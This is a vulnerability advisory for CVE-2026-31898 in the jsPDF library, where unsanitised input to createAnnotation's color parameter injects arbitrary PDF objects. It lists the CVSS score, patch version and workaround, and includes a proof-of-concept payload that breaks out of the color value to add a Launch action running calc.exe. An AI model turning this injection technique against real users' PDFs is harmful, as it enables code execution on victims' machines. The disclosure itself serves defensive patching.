CVE-2026-31898

CVSS v3.1

8.1

Vector

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Impact

User control of arguments of the createAnnotation method allows users to inject arbitrary PDF objects, such as JavaScript actions.

If given the possibility to pass unsanitized input to the following method, a user can inject arbitrary PDF objects, such as JavaScript actions, which might trigger when the PDF is opened or interacted with..

createAnnotation: color parameter

Example attack vector:

import { jsPDF } from 'jspdf'

const doc = new jsPDF();

const payload = '000000) /AA <</E <</S /Launch /F (calc.exe)>>>> (';

doc.createAnnotation({
 type: 'freetext',
 bounds: { x: 10, y: 10, w: 120, h: 20 },
 contents: 'hello',
 color: payload
});

doc.save('test.pdf');

Patches

The vulnerability has been fixed in jsPDF@4.2.1.

Workarounds

Sanitize user input before passing it to the vulnerable API members.

Fix

Improper Encoding or Escaping of Output

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-116

Related Identifiers

CVE-2026-31898

GHSA-7X6V-J9X4-QF24

Affected Products

Jspdf

CVE-2026-31898

Impact

Patches

Workarounds

Weakness Enumeration

Related Identifiers

Affected Products

References · 7